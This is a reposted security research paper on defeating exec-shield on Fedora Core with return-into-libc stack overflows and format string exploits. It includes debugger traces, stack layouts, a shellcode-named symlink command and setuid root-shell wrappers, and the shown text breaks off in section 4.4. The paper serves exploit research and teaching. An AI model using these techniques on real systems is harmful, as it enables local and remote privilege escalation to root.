[转载]Advanced exploitation in exec-shield (Fedora Core case study)

文章作者:"dong-hun you"(Xpl017Elz) in INetCop <szoahc@hotmail.com>

http://x82.inetcop.org & http://www.inetcop.org

P.S: I am very worried about miss-translation may occur.
     So, I have tried to explain the ideas with picture and graph than words.
     Some of these contents were published on POC 2006 held in Korea.
     I have put the old concept and new one altogether for coherence.
     So, Please be generous about the overlap. All these codes and exploit
     are tested on Fedora Core system.

--[ 1 - Intro

1 - Intro

2 - Brief features of Fedora Core system (gcc + glibc + exec-shield)
  2.1 - non-executable randomization stack, malloc heap, randomization library
  2.2 - Addressing system under 16mb (NULL pointer dereference protection)
  2.3 - PIE technology (changed gcc)
  2.4 - Changed method of accessing function parameter (changed glibc)

3 - Stack based overflow exploitation on exec-shield environment
  3.1 - Exploit by moving %esp, %ebp register
  3.2 - Remote exploit by moving %esp register
  3.3 - Using exec family function and symlink
  3.4 - Using exec family function and environment variables
  3.5 - Exploit on classic shellcode library area
  3.6 - Example code

4 - How to do format string exploit on exec-shield environment
  4.1 - Remote attack by using do_system() function
  4.2 - Local exploit by moving %esp, %ebp register
  4.3 - Using __do_global_dtors_aux() function, setuid() function and do_system() function
  4.4 - Using __do_global_dtors_aux() function and exec family function
  4.5 - Changing __DTOR_END__ location (overwriting p section)
  4.6 - Format string in classic shellcode library area
  4.7 - Example code

5 - How to exploit since Fedora Core 5 system
  5.1 - Changes on main() function prolog and epilog
  5.2 - Exploit by using off-by-one exploit with %ecx register
  5.3 - Overflow exploit overwriting __DTOR_END__ section
  5.4 - Overflow exploit overwriting GLOBAL OFFESET TABLE
  5.5 - Example code

6 - Appendix
  6.1 - ret(pop %eip) remote stack overflow exploit
  6.2 - ret(pop %eip) + symlink local stack overflow exploit
  6.3 - ret(pop %eip) + environment local stack overflow exploit
      6.3.1 - execl() local exploit
      6.3.2 - execle() local exploit
      6.3.3 - execlp() local exploit
      6.3.4 - execv() local exploit
      6.3.5 - execvp() local exploit
      6.3.6 - execve() local exploit
  6.4 - library shellcode stack overflow exploit
      6.4.1 - Test exploit with strcpy function example
      6.4.2 - Test exploit with sprintf function example
  6.5 - do_system() remote format string exploit
  6.6 - p section overwrite local format string exploit
  6.7 - __do_global_dtors_aux() + exec family local format string exploit
  6.8 - library overwrite local format string exploit
  6.9 - %ecx off-by-one exploit and the test exploit
  6.10 - string copy plt + do_system() __DTOR_END__ overwrite remote stack overflow exploit
  6.11 - string copy plt + execve() __DTOR_END__ overwrite local stack overflow exploit
  6.12 - string copy plt + execve() GOT overwrite local stack overflow exploit

7 - Reference


  I had the first contact with Fedora Core exe-shield system from a hacking
competition 2 years ago. Since then, I had studied the system for a month and
I published it on POC 2006(Power Of Community) conference held in Korea.
What I did and studied was application of existing return-into-libc technique
which had been studied by many excellent hackers to latest system.
This paper contains very simple things and you probably know many of them.

  This paper can be separated into 3 parts.
The first section is about trying stack overflow attack on exec-shield
environment. The second section is about trying format string attack on
exec-shield by using some features of some functions. And we will discuss
some attack technique for changed prolog and epilog and both remote and local
attack skills since Fedora Core 5 system. Fedora Core system has exec-shield
kernel by default, so I , mostly , will talk about Fedora Core system. As a
matter of course, those technique can be applied to CentOS , White box linux
and Redhat Enterprise with little change. I strongly recommend you to read
references before reading this paper.



--[ 2 - Brief features of Fedora Core system (gcc + glibc + exec-shield)

  Fedora Core is a project run by Redhat and it provides technical
background. Fedora Core (F/C since now), unlike old RedHat OS, has stack and
heap hacking prevent system called exec-shield. Exec-shield makes its
specialty of blocking all the existing attacks concern stack, buffer,
function pointer overflow and overwriting data structure or injecting code
on that data structure. You can find more by looking ANNOUNCE-exec-shield
on Reference 7.16


----[ 2.1 - non-executable randomization stack, malloc heap, randomization library

  Stack and data area, heap area allocated by malloc() function are now
non-executable, and it makes classic shellcode useless. Area that library is
mapped ,merely, has execute privilege. But even this will be re-mapped on
every single execution. This randomizing algorithm ,unlike that of Redhat
Linux 9.0, is very unpredictable. It looks very similiar to Openwall Project
(7.12) of Solar Designer and PaX kernel system (7.13)


----[ 2.2 - Addressing system under 16mb (NULL pointer dereference protection)

  Kernel re-maps all PROT_EXEC mapping in ascii-armor area and make its
address system less than 16mb. This idea came from the fact that hackers use
4byte library address when they make overflow attempt on old 32bit system.
By doing this, memory address now has null in the address it means many
memory related hacking technique such as return-into-libc(7.2) are now hard
to be used. Sometimes, there is a chance to enter null into overflowed
buffer easily. But on this paper, I am not going to talk about this.
In addition, recent changes on glibc make some library function address end
with null or 0x20.


----[ 2.3 - PIE technology (changed gcc)

  PIE stands for Position Independent Executables is a similar concept with
old PIC. This is a way to protect application from being exploited by attacks
such as buffer overflow.

----[ 2.4 - Changed method of accessing function parameter (changed glibc)

  F/C 3 has glibc 2.3.3 on it. This glibc handles the commands that passed
into system() and exec family function with %ebp register. With the stack
overflow happening, hacker can manipulate %ebp register, so there is still
a good chance to indicate certain command to execute.


fedora core 3 glibc 2.3.3 system():

        <system+17>: mov    0x8(%ebp),%esi                ; refers %ebp + 8

fedora core 4 glibc 2.3.5 system():

        <system+14>: mov    0x10(%esp),%edi                ; refers %esp + 16

But since glibe 2.3.5 on F/C 4, it refers %esp register that a user can not
directly manipulate. glibc-2.x.x/posix/Makefile gives you a great
explanation about why did it happen.


-bash-3.00$ pwd
/tmp/glibc-2.3.5/posix
-bash-3.00$ cat Makefile |grep fomit
CFLAGS-wordexp.os = -fomit-frame-pointer
CFLAGS-spawn.os = -fomit-frame-pointer
CFLAGS-spawnp.os = -fomit-frame-pointer
CFLAGS-spawni.os = -fomit-frame-pointer
CFLAGS-execve.os = -fomit-frame-pointer
CFLAGS-fexecve.os = -fomit-frame-pointer
CFLAGS-execv.os = -fomit-frame-pointer
CFLAGS-execle.os = -fomit-frame-pointer
CFLAGS-execl.os = -fomit-frame-pointer
CFLAGS-execvp.os = -fomit-frame-pointer
CFLAGS-execlp.os = -fomit-frame-pointer
-bash-3.00$

you can see that library structure has been changed by -fomit-frame-pointer
option. The option is also applied to exec family functions as well.


fedora core 3 glibc 2.3.3 execve():

        <execve+9>:  mov    0xc(%ebp),%ecx                ; second argument of execve()
        <execve+27>: mov    0x10(%ebp),%edx                ; third argumet of execve()
        <execve+30>: mov    0x8(%ebp),%edi                ; first argument of execve()

fedora core 4 glibc 2.3.5 execve():

        <execve+13>: mov    0xc(%esp),%edi                ; first argument of execve()
        <execve+17>: mov    0x10(%esp),%ecx                ; second argument of execve()
        <execve+21>: mov    0x14(%esp),%edx                ; third argument of execve()

execve() function in old glibc (2.3.3) refers command argument from memory
of %ebp + 0x08, but in last version of glibe (2.3.5), it refers %esp + 0x0c.



--[ 3 - Stack based overflow exploitation on exec-shield environment

  Now, we confront with some obstacles. First, the library function has NULL
within its address. Second, we need to fight some glibc functions that are
compile with -fomit-frame-pointer option under exec-shield which is
non-executable on both stack and heap. Fortunately, it is not the worst
situation. As a matter of fact, we can tell whether the attack will be
a piece of cake or not, only after analyzing structure of target program.
Let me introduce some of the possible hacking technique.


----[ 3.1 - Exploit by moving %esp, %ebp register

  Below is the easiest and the most common way to attack system with
-fomit-frame-pointer option compiled glibc. Before going into the attack
technique, I feel like to tell you "how to move %esp register by 4bytes".

        ret        ; pop %eip

Generally, it is very common to pop %eip register from stack to return to
previous function. it is called epilog process and this process finally
moves %esp register by 4bytes.


<- stack grows this way                                     address grows this way ->
...                          10     14     18     22 (return address moves by 4bytes)
|...--------------------------|------|------|------|-----------------------------...|
                           [ret]   [ret]  [ret] [XXXX]
                              |    ^ |    ^ |     ^
                              |    | |    | |     |
                              +----+ +----+ +-----+ (%esp register moves by 4bytes)
                              %esp+4 %esp+4 %esp+4 (stack gets smaller by pop)

With this technique, we can use some of the contents in stack to attack the
system and indicate a certain location of stack to be a argument of function
that is called only for once. In addition, we can move the stack pointer by
greater than 4bytes.


fedora core 5 glibc 2.4, gcc 4.1.0-3:

        <__libc_csu_init>:
        ...
        add    $0x1c,%esp
        pop    %ebx
        pop    %esi
        pop    %edi
        pop    %ebp
        ret

        <__do_global_ctors_aux>:
        ...
        add    $0x4,%esp
        pop    %ebx
        pop    %ebp
        ret

glibc since F/C 5 skips the epilog process with some functions which exist
in binary by default. This helps us to move %esp register by as many bytes
as we want. Only with this condition, it is possible to demonstrate the
technique of Phrack 58-4 (by Nergal 7.7). Especially, by using "plt" string
copy function, it is also possible to call same function for many times and
by calling it appropriately we can finally execute shellcode (Phrack 58-4,
3.2 contains this vulnerability). We are going to talk about this at
chapter 5.3.


<- stack grows this way                                    address grows this way ->
+-----------+------+------------+------------+-----------+------+------------+-----+
| func1 plt | eplg | func1_arg1 | func1_arg2 | func2 plt | eplg | func2_arg1 | ... |
+-----------+------+------------+------------+-----------+------+------------+-----+
               ^                                           ^
               |                                           |
               +-------------------------------------------+
                 (As many bytes as %esp is added or popped)

We also can manipulate %esp register in directly by doing leave as if we can
manipulate %esp register well.


----[ 3.2 - Remote exploit by moving %esp register

  I want to tell you about remote attack by moving %esp register on F/C 3 as
an example. It only happens on a special circumstance but it still tells us
that the attack by moving %esp register is possible.

First, F/C 3 has glibc 2.3.3 and glibc 2.3.3 has __libc_start_main() function
that calls _setjmp() gives us a very nice attack example.


fedora core 3 glibc 2.3.3, gcc 3.4.2-6.fc3:

        <__libc_start_main+160>:     call   0xf6edf720 <_setjmp>
        <_setjmp+0>: xor    %eax,%eax
        <_setjmp+2>: mov    0x4(%esp),%edx
        <_setjmp+6>: mov    %ebx,0x0(%edx)
        <_setjmp+9>: mov    %esi,0x4(%edx)
        <_setjmp+12>:        mov    %edi,0x8(%edx)        ; IMPORTANT!
        <_setjmp+15>:        lea    0x4(%esp),%ecx        ; breakpoint
        <_setjmp+19>:        mov    %ecx,0x10(%edx)
        <_setjmp+22>:        mov    0x0(%esp),%ecx
        <_setjmp+26>:        mov    %ecx,0x14(%edx)
        <_setjmp+29>:        mov    %ebp,0xc(%edx)
        <_setjmp+32>:        mov    %eax,0x18(%edx)
        <_setjmp+35>:        ret
        <_setjmp+36>:        nop

...
Breakpoint 1, 0x00a2172c in _setjmp () from /lib/tls/libc.so.6
(gdb) x $edi
0xfefffb10:     0x00b1cff4
(gdb) x $edx
0xfefffb10:     0x00b1cff4
(gdb) x $edx+8
0xfefffb18:     0xfefffb10                ; 8bytes lesser
(gdb)

Through the process ,%edx + 8 has memory address that smaller than itself by
8bytes. Now, what if we move the %esp register to old _setjmp() %edx register
and then call system() function?


<-- stack grows this way                                       address grows this way -->
+------------+----------+------------+------------+------------+------------+-----------+
|     buf    |   %ebp   |     ret    |   ret+4    |   ret+8    |   ret+12   |   ret+20  |
+------------+----------+------------+------------+------------+------------+-----------+
... xxxxx ... 0x70707070 main()'s ret main()'s ret main()'s ret main()'s ret  system();

Below is the process

(1) After overwriting %ebp with 0x70707070 for test,
    move %esp to old _setjmp() %edx by repeating ret (pop %eip)

(2) Calling system() function at the position of old _setjmp() %edx
    register saves old %ebp register to stack by prolog process

(3) After prolog process, now %ebp of system() function points 0x70707070


* Stack status before attack:

fedora core 3 glibc 2.3.3, gcc 3.4.2-6.fc3:

        <_setjmp+12>:        mov    %edi,0x8(%edx)

0xfef16bf0:     0xf6fdaff4      0x00000000      0xfef16bf0
                ~~~~~~~~~~                      ~~~~~~~~~~
                     |                               |
                     +--> old _setjmp() %edx         +--> old _setjmp() %edx+8

* Stack status after attack:

fedora core 3 glibc 2.3.3, gcc 3.4.2-6.fc3:

        <system+0>:  push   %ebp                ; %ebp has 0x70707070.
        <system+1>:  mov    %esp,%ebp                ; recent %ebp becomes pushed old %ebp

0xfef16bf0:     0x70707070      0x00000000      0xfef16bf0
                ~~~~~~~~~~                      ~~~~~~~~~~
                     |                               |
                     +--> system() %ebp              +--> system() function argument

system() function refers %ebp+8 as a argument ,so above will try to execute
0x70707070. Thus we can use strings like "sh" (0x6873) to execute a shell.
Like this case, you need to find out useful values on stack by repeating ret
command. This is a tiny example of exploit using structure of a program.
There may be a lot more possibilities to exploit when it comes to real
applications.


----[ 3.3 - Using exec family function and symlink

  By moving %esp, we can search stack for a right value for a function
argument. We should find three values from stack for execve(), because
execve() function refers arguments by %esp register address. You can,
of course, use execv() that uses only 2 arguments.


* Stack status after executing exploit:

fedora core 4 glibc 2.3.5, gcc 4.0.0-8:

        <execve+0>:  push   %edi                ;  prolog
        <execve+1>:  push   %ebx

        <execve+13>: mov    0xc(%esp),%edi
        <execve+17>: mov    0x10(%esp),%ecx
        <execve+21>: mov    0x14(%esp),%edx

<- stack grows this way                                 address grows this way ->
+-------+---+---+---------------------------------------------------------------+
|  buf  |ebp|eip|                            buffer                             |
+-----------+---+---+---+---+---+---+---+---+---------------+----+----+----+----+
|XXXXXXXX...|ret|ret|ret|ret|ret|ret|ret|ret|execve()'s addr|XXXX|arg1|arg2|arg3|
+-----------+---+---+---+---+---+---+---+---+---------------+----+----+----+----+
              ^
              +---------------------------->
                          (flow)

We can see getting first argument from %esp+0x0c after prolog process of
execve() function. After 9 times of moving %esp register by ret, I could find
appropriate command for the first argument of execve() function when I tested
on F/C 4.


* Stack status after 9 times of repeating ret code and calling execve() function:

fedora core 4 glibc 2.3.5, gcc 4.0.0-8:

(gdb) br *execve+13
Breakpoint 2 at 0x19e1b9
(gdb) c
Continuing.

Breakpoint 2, 0x0019e1b9 in execve () from /lib/libc.so.6
(gdb) x/x $esp+0x0c
0xbf8b42b8:     0x080483b4                ; fist argument of execve() function ($esp + 0x0c)
(gdb)
0xbf8b42bc:     0xbf8b42e8                ; second argument of execve() function ($esp + 0x10)
(gdb)
0xbf8b42c0:     0xbf8b4290                ; third argument of execve() function ($esp + 0x14)
(gdb) x 0x080483b4
0x80483b4 <__libc_csu_init>:    0x57e58955        ; fist argument of execve() function
(gdb)
0x80483b8 <__libc_csu_init+4>:  0xec835356
(gdb)
0x80483bc <__libc_csu_init+8>:  0x0000e80c
(gdb) x 0xbf8b42e8
0xbf8b42e8:     0x00000000        ; second argument of execve() function
(gdb) x 0xbf8b4290
0xbf8b4290:     0x08048296        ; third argument of execve() function
(gdb)
0xbf8b4294:     0x08048296
(gdb)
0xbf8b4298:     0x08048296
(gdb)

It shows that %esp has moved till the starting address of __libc_csu_init()
function. The address values stored in that point is stored in stack before
main(). Now that we got a address value to execute as a command, all we need
to do now is to link with a program that we want to execute for privilege
elevation through syslink. This syslink technique came from Lamagra (7.4)


[x82@localhost tmp]$ cat sh.c
int main()
{
        setuid(0);
        setgid(0);
        system("/bin/sh");
}
[x82@localhost tmp]$ gcc -o sh sh.c
[x82@localhost tmp]$ ln -s sh `printf "\x55\x89\xe5\x57\x56\x53\x83\xec\x0c\xe8"`

We can link __libc_csu_init() function code itself as a execution command.
This will be quite effective on real application exploit. You can find more
in exploit code example.


----[ 3.4 - Using exec family function and environment variables

  I have thought about this technique when I tried local man exploit. This
seems quite effective under certain circumstance that a hacker can put
ret (pop %eip) command as many as he want. If there were a vulnerability on
a local variable located in a stack frame near argument pointer,
environment variable pointer, that would be the best condition for this skill
to work.

argument pointer and environment variable pointer is made of array of
pointers that point each datum. There is, always, Null at the end of the
pointer and we can judge whether it is the end of pointer by NULL.


^
| Stack grows this way
...
+---------------------+
|  argument0 pointer  |: argument starts here.
+---------------------+
|  argument1 pointer  |
+---------------------+
|         ...         |
+---------------------+
| argument(n) pointer |
+---------------------+
|  null (0x00000000)  |: argument ends here.
+---------------------+
|   environ0 pointer  |: environment starts here.
+---------------------+
|   environ1 pointer  |
+---------------------+
|         ...         |
+---------------------+
|  environ(n) pointer |
+---------------------+
|  null (0x00000000)  |: environment ends here.
+---------------------+
...
| Address grows this way
V

I want you to read FC_local_environ_bof.txt file on reference 7.18 for base
knowledge. First we need to call some functions whose arguments can be set
as environment variables like execve() and then assign each argument in
environment variables. Then, by repeating ret code, move %esp register
to the environment variable pointer ,and ,finally, call exec family function.

Attack flow will be like below whatever execv family function you choose.
for me, I chose execve() function.


fedora core 6 glibc 2.5, gcc 4.1.1-30:

Environment variable:

+------------------+
|     "./sh"       |: will be the first argument of execve()
+------------------+
|       '\0'       |: will be the second argument of execve()
+------------------+
|       '\0'       |: will be the third argument of execve()
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+
|       '\0'       |
+------------------+

Attack code:

All we need to do is set execve() function 8byte prior to environment
argument pointer. By doing so, the "./sh", first environment variable that
we entered, will be mistaken as the first argument of execve() when execve
is called . It happens because computer refers the address of %esp + 4byte
as argument.

^
| stack grows this way
...
+------------------+
|      buffer      |: local variable which will be overflowed
+------------------+
|   ret(pop %eip)  |: move %esp by 4bytes
+------------------+
|   ret(pop %eip)  |
+------------------+
|   ret(pop %eip)  |
+------------------+
|   ret(pop %eip)  |
+------------------+
|        ...       |
+------------------+
|   execve() func  |: address of environment variation pointer - 8byte
+------------------+
| null(0x00000000) |: end of argument pointer
+------------------+
| environ0 pointer |: environment variable "./sh" (it will be the first argument of execve() function)
+------------------+
| environ1 pointer |: environment variable NULL pointer (it will be the second argument of execve() function)
+------------------+
| environ2 pointer |: environment variable NULL pointer (it will be the third argument of execve() function)
+------------------+
...
| address grows this way
V

It is very reasonable to put null code in environment variable for 5 times.
the second environment variable pointer after the first one "./sh" should
have 4bytes of null (0x00000000). That's why I entered 4bytes of null.
And the third environment variable pointer also should have 4bytes of null
code. So, I added 1 more byte of null to satisfy this condition. (You can
use not only the environment variable pointer but also argument pointer)


Debugging result for fedora core 6 glibc 2.5, gcc 4.1.1-30, exploit:

[root@localhost exec]# gdb 0x82-x_execve -q
...
(gdb) r
...

Program received signal SIGSEGV, Segmentation fault.
0x00000000 in ?? ()
(gdb) x/7x $esp
0xbf9fde80:     0xbf9fffeb      0xbf9ffff0      0xbf9ffff1      0xbf9ffff2
0xbf9fde90:     0xbf9ffff3      0xbf9ffff4      0x00000000
(gdb) x/s 0xbf9fffeb
0xbf9fffeb:      "./sh"    <=== the first argument of execve()
(gdb) x/x 0xbf9ffff0
0xbf9ffff0:     0x00000000 <=== the second argument of execve()
(gdb) x/x 0xbf9ffff1
0xbf9ffff1:     0x00000000 <=== the third argument of execve()
(gdb)

Arguments will be pushed like above when execve() is called. Both second and
third arguments points null code. You can also input null code directly to
both arguments by using argument pointer.

execve("./sh",0xbf9ffff0,0xbf9ffff1); or execve("./sh",0x00000000,0x00000000);

Please see example exploit code for more.


----[ 3.5 - Exploit on classic shellcode library area

  Ret code and environment variable pointers are also used for this technique.
There is nothing new about this technique, but it still means something for
it can execute a classic shellcode. First, we should remember that the
classic shellcode can be run in library.


[x82@localhost ~]$ cat /proc/self/maps | grep rwxp
0048a000-0048c000 rwxp 00122000 fd:00 211398     /lib/tls/libc-2.3.3.so
0048c000-0048e000 rwxp 0048c000 00:00 0
00a93000-00a94000 rwxp 00a93000 00:00 0
00c68000-00c69000 rwxp 00015000 fd:00 211343     /lib/ld-2.3.3.so
0804c000-0804d000 rwxp 00003000 fd:00 65057      /bin/cat
0804d000-0806e000 rwxp 0804d000 00:00 0
[x82@localhost ~]$

Attack process:

(1) Declare shellcode in environment variable through execve() function.

(2) Remember not to use copy function address under 16 mb, use plt copy
    function code. Thus, we can make the first argument of copy function.

(2) Repeat ret code to make the shellcode environment variable pointer
    declared at step 1 the second argument of copy function.

(4) Put ret code again right after calling copy function. By doing so,
    The first argument of copy function, shellcode, will be called.

(5) You should input executable library address into the first argument
    of copy function. We should be thankful that library address is located
    within 16mb (3byte)


* fedora core 4 glibc 2.3.5, gcc 4.0.0-8:

Structure of environment variable:

+-----------+
| shellcode |
+-----------+

Making attack code:

<- Stack grows this way                                         Address grows this way ->
+-------+-----+-----+-----+-----+-----+-----+----------------------+-----+--------------+
|  buf  | ret | ret | ret | ... | ret | ret | string copy func plt | ret | library addr |
+-------+-----+-----+-----+-----+-----+-----+----------------------+-----+--------------+

Put shellcode into empty library space and do ret code. Then, library address
that contains shellcode will be popped into %eip and we can finally execute
a shell.

To call copy function many times, we can try %esp moving technique that
mentioned at chapter 3.1. Because this skill can move stack pointer more than
4bytes, we can try other attack technique. You should check chapter 5.3 and 5.4
for more.


----[ 3.6 - Example code

  I have told some of attack technique that uses %esp register movement.
Appendix codes at chapter 6 will prove those 4 technique already been told.

0x82-remote_ret.sh script at chapter 6.1 is about the remote attack code
we study at chapter 3.2. And 0x82-break_FC4.c code at 6.2 is about exec
family function + symlink technique at chapter 3.4. 0x82-x_execl.c,
0x82-x_execle.c, 0x82-x_execlp.c, 0x82-x_execv.c, 0x82-x_execvp.c,
0x82-x_execve.c those codes are for the exec family + environment variable
attack at 3.4. Finally, 0x82-x_strcpy.c, 0x82-x_sprintf.c for the shellcode
attack mentioned at 6.4.



--[ 4 - How to do format string exploit on exec-shield environment

  Unlike overflow technique, moving on stack is not easy on format string
attack. So, we will take advantage of some special functions to attack.


----[ 4.1 - Remote attack by using do_system() function

  I have found that system() function calls do_system() since F/C glibc
2.3.3. Old system() function called execve() internally, but changed system()
input command argument into %esi register and copy it to %eax register.
Finally, make it an argument of do_system() function.


fedora core 3 glibc 2.3.3, gcc 3.4.2-6.fc3:

        <system+17>: mov    0x8(%ebp),%esi                ; insert the value at %ebp+8 into %esi register
        <system+46>: mov    %esi,%eax                        ; insert %esi regiseter into  %eax register
        <system+62>: jmp    0x77d320 <do_system>        ; call do_system()

do_system() receives command argument through %eax register and makes
"sh -c command" then passes it to execve(). In short, do_system() doesn't use
frame pointer and stack pointer when it receives an argument. It only refers
%eax register. That's why we can take advantage of do_system(). What would
happen if we call do_system() inside of __do_global_dtors_aux() function?


fedora core 6 glibc 2.5, gcc 4.1.1-30:

        <__do_global_dtors_aux+0>:   push   %ebp
        <__do_global_dtors_aux+1>:   mov    %esp,%ebp
        <__do_global_dtors_aux+3>:   sub    $0x8,%esp
        <__do_global_dtors_aux+6>:   cmpb   $0x0,0x80495bc
        <__do_global_dtors_aux+13>:  je     0x804837b <__do_global_dtors_aux+27>
        <__do_global_dtors_aux+15>:  jmp    0x804838d <__do_global_dtors_aux+45>
        <__do_global_dtors_aux+17>:  add    $0x4,%eax      (4) change %eax into __DTOR_END__+4
        <__do_global_dtors_aux+20>:  mov    %eax,0x80495b8
        <__do_global_dtors_aux+25>:  call   *%edx          (5) call __DTOR_END__
        <__do_global_dtors_aux+27>:  mov    0x80495b8,%eax (1) change %eax into __DTOR_END__
        <__do_global_dtors_aux+32>:  mov    (%eax),%edx    (2) %edx has the valeu of __DTOR_END__
        <__do_global_dtors_aux+34>:  test   %edx,%edx      (3) go back if %edx is not NULL
        <__do_global_dtors_aux+36>:  jne    0x8048371 <__do_global_dtors_aux+17>
        <__do_global_dtors_aux+38>:  movb   $0x1,0x80495bc
        <__do_global_dtors_aux+45>:  leave
        <__do_global_dtors_aux+46>:  ret
        <__do_global_dtors_aux+47>:  nop

You can find %eax register become __DTOR_END__ +4. After the %eax register
become __DTOR_END__, %edx has the value of __DTOR_END__. If %edx register is
not NULL, %eax register would move 4bytes (__DTOR_END__+4) and call *%edx.
It continues to add 4bytes and call each function saved in __DTOR_END__ section.

If __DTOR_END__ section is overwritten with do_system() address, %eax register
would be 4byte more than __DTOR_END__. Let's debug after overwriting
__DTOR_END__ section with do_system() to check.


Breakpoint 1, 0x0077d320 in do_system () from /lib/tls/libc.so.6
(gdb) x/x 0x080494e4
0x80494e4 <__DTOR_END__>:       0x0077d320        ; overwrite __DTOR_END__ with do_system() function address
(gdb) i r
eax            0x80494e8        134517992        ; address of %eax register
ecx            0x86d378 8835960
edx            0x77d320 7852832
ebx            0x80495b8        134518200
esp            0xfeed97fc       0xfeed97fc
ebp            0xfeed9808       0xfeed9808
esi            0xffffffff       -1
edi            0x80494d8        134517976
eip            0x77d320 0x77d320
eflags         0x206    518
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/x $eax
0x80494e8 <__JCR_LIST__>:       0x00000001
(gdb)

We can see %eax is 4bytes over __DTOR_END__. This will open a new shell if
we write "sh" string on %eax register. There is a good chance to execute
shell without stack on remote. You can see more on exploit code example.


----[ 4.2 - Local exploit by moving %esp, %ebp register

  Although It is very restricted than former technique, we can still move
%esp and %ebp by format string technique by making frames many times on
stack. I thought I could move %esp, %ebp register by calling a function
continually. But general function that does prolog and epilog would not mean
anything. So, I decided to try __do_global_dtor_aux(). First of all, we need
to make a frame.


        <__do_global_dtors_aux+25>:  call   *%edx ; push %eip

        <__do_global_dtors_aux+0>:   push   %ebp
        <__do_global_dtors_aux+1>:   mov    %esp,%ebp
        <__do_global_dtors_aux+3>:   sub    $0x8,%esp

<- Stack grows this way                                      Address grows this way  ->
+-------------+------+------++-------------+------+------++-------------+------+------+
|    8byte    | %ebp | %eip ||    8byte    | %ebp | %eip ||    8byte    | %ebp | %eip |
+-------------+------+------++-------------+------+------++-------------+------+------+
^                           ^^                           ^^                           ^
|                           ||                           ||                           |
+---------- 16byte ---------++---------- 16byte ---------++---------- 16byte ---------+

There will be 16bytes of space when you repeat the process above. It is
possible to raise stack without removing frame because of the 25th line in
__do_global_dtors_aux() that calls desired function by call *%edx syntax.
We can move %esp and %ebp register indirectly by using
__do_global_dtors_aux(). In addition, _fini() function that calls
__do_global_dtors_aux() also can move stack pointer.


fedora core 6 glibc 2.5, gcc 4.1.1-30:

        <_fini+0>:   push   %ebp
        <_fini+1>:   mov    %esp,%ebp
        <_fini+3>:   push   %ebx
        <_fini+4>:   sub    $0x4,%esp
        <_fini+7>:   call   0x8048444 <_fini+12>
        <_fini+12>:  pop    %ebx
        <_fini+13>:  add    $0x1100,%ebx
        <_fini+19>:  call   0x8048300 <__do_global_dtors_aux>
        <_fini+24>:  pop    %ecx
        <_fini+25>:  pop    %ebx
        <_fini+26>:  leave
        <_fini+27>:  ret

It can adjusted depends on target program architecture.


----[ 4.3 - Using __do_global_dtors_aux() function, setuid() function and do_system() function

  We can indicate function argument based on chapter 4.2 even if it is
restricted. But the do_system() function technique is still not good enough
for a local exploit. That's why we should use setuid() function with it.
setuid() refers its argument from %ebp+8. All we need to do is find some
address that %ebp+8 is NULL and call the function.

In my case on F/C 6, I could make the argument of setuid() 0(null) when I
called __do_global_dtors_aux() function once again. Now, all we need to do is
calling do_system() function and set "sh" string properly. then, we will get
a root shell.

...
+-------------------------+
| __do_global_dtors_aux() |: calling __do_global_dtors_aux()
+-------------------------+
|        setuid()         |: calling setuid()
+-------------------------+
|       do_system()       |: calling do_system()
+-------------------------+
|          "sh"           |
+-------------------------+
...

Stack based overflow that uses ret(pop %eip) code and execve() function will
move %esp register by 4bytes. (address increases and stack decreases.) But
the technique we are talking about is opposite to that. It moves %esp and
%ebp by 16bytes (address decreases and stack increase.) We can find right
value from stack by increasing or decreasing registers.


----[ 4.4 - Using __do_global_dtors_aux() function and exec family function

  Attack technique that I mentioned at chapter 4.3 has a problem that it is
useful only to get root uid. To solve this problem, most of local overflow
technique uses exec family function. On this chapter, I will show you local
format string technique that uses exec family function.

I will use little bit of __do_global_dtors_aux() function to launch an attack.

First, I made a frame on stack by calling __do_global_dtors_aux() function.
If you don't declare any local variable and only re-execute the call code in
__do_global_dtors_aux(), it would store the %eip of recent
__do_global_dtors_aux() in stack. Now, you can use stored %eip as the first
argument of execv() when you just call execv() function. (we use execv()
function because this function needs only 2 arguments) Rest of attack process
is same as exec family function + symlink attack.

Attack process:

(1) Overwrite __DTOR_END__+0 address with __do_global_dtors_aux() function
    address.

(2) Overwrite __DTOR_END__+4 address with __do_global_dtors_aux()+27
    address.

(3) Overwrite __DTOR_END__+8 address with execv() function address.

(4) symlink with the program that executes %eip of __do_global_dtors_aux()
    points.

Stack will be like this, if you allocate local variables and execute
call *%edx syntax properly.


^
| Stack grows this way
...
+----------------------------------------+
| __do_global_dtors_aux() return address |: 4byte
+----------------------------------------+
| __do_global_dtors_aux() return address |: 4byte (will be the first argument of execv())
+----------------------------------------+
|              0x00000000                |: 8byte (will be the second argument of execv())
+----------------------------------------+
|              0x00000001                |
+----------------------------------------+
|     __do_global_dtors_aux() %ebp       |: 4byte
+----------------------------------------+
...
| Address grows this way
V

To make stack structure like that, the call command in
__do_global_dtors_aux+25 has to be executed correctly. To execute
call command correctly, we need to start from __do_global_dtors_aux+27 where
right after call *%edx command is done. You should look at 27th code in
__do_global_dtors_aux in chapter 4.1.


        <__do_global_dtors_aux+27>:  mov    0x80495b4,%eax
                                            (Starting procedure to call *%edx register)

Those are the value of each argument after calling execve() fucntion inside
of execv() function.


Breakpoint 3, 0x0019dc28 in execve () from /lib/libc.so.6
(gdb) x/x $ebx
0x804834b <__do_global_dtors_aux+27>:   0x0495b4a1      ; first argumet of execve()
(gdb) x/x $ecx
0x0:    Cannot access memory at address 0x0             ; second argument of execve()
(gdb) x/x $edx
0xbfdbd040:     0xbfdbec04                              ; third argument of execve()
(gdb) x 0x0804834b
0x804834b <__do_global_dtors_aux+27>:   0x0495b4a1      ; entire code that used as the first argument execv()
(gdb)
0x804834f <__do_global_dtors_aux+31>:   0x85108b08
(gdb)
0x8048353 <__do_global_dtors_aux+35>:   0xc6eb75d2
(gdb)
0x8048357 <__do_global_dtors_aux+39>:   0x0495b805
(gdb)
0x804835b <__do_global_dtors_aux+43>:   0xc3c90108
(gdb)
0x804835f <__do_global_dtors_aux+47>:   0xe5895590
(gdb)
0x8048363 <frame_dummy+3>:      0xa108ec83
(gdb)
0x8048367 <frame_dummy+7>:      0x080494c4
(gdb)
0x804836b <frame_dummy+11>:     0x1274c085
(gdb)
0x804836f <frame_dummy+15>:     0x000000b8
(gdb)

From __do_global_dtors_aux+27th line to frame_dummy+15th line will be the
first argument of exev() function. After this, rest of course is same as
symlink attack mentioned at chapter 3.3.


sh-3.1# cat > shell.c
int main()
{
        setuid(0);
        setgid(0);
        execl("/bin/bash","bash",0);
}

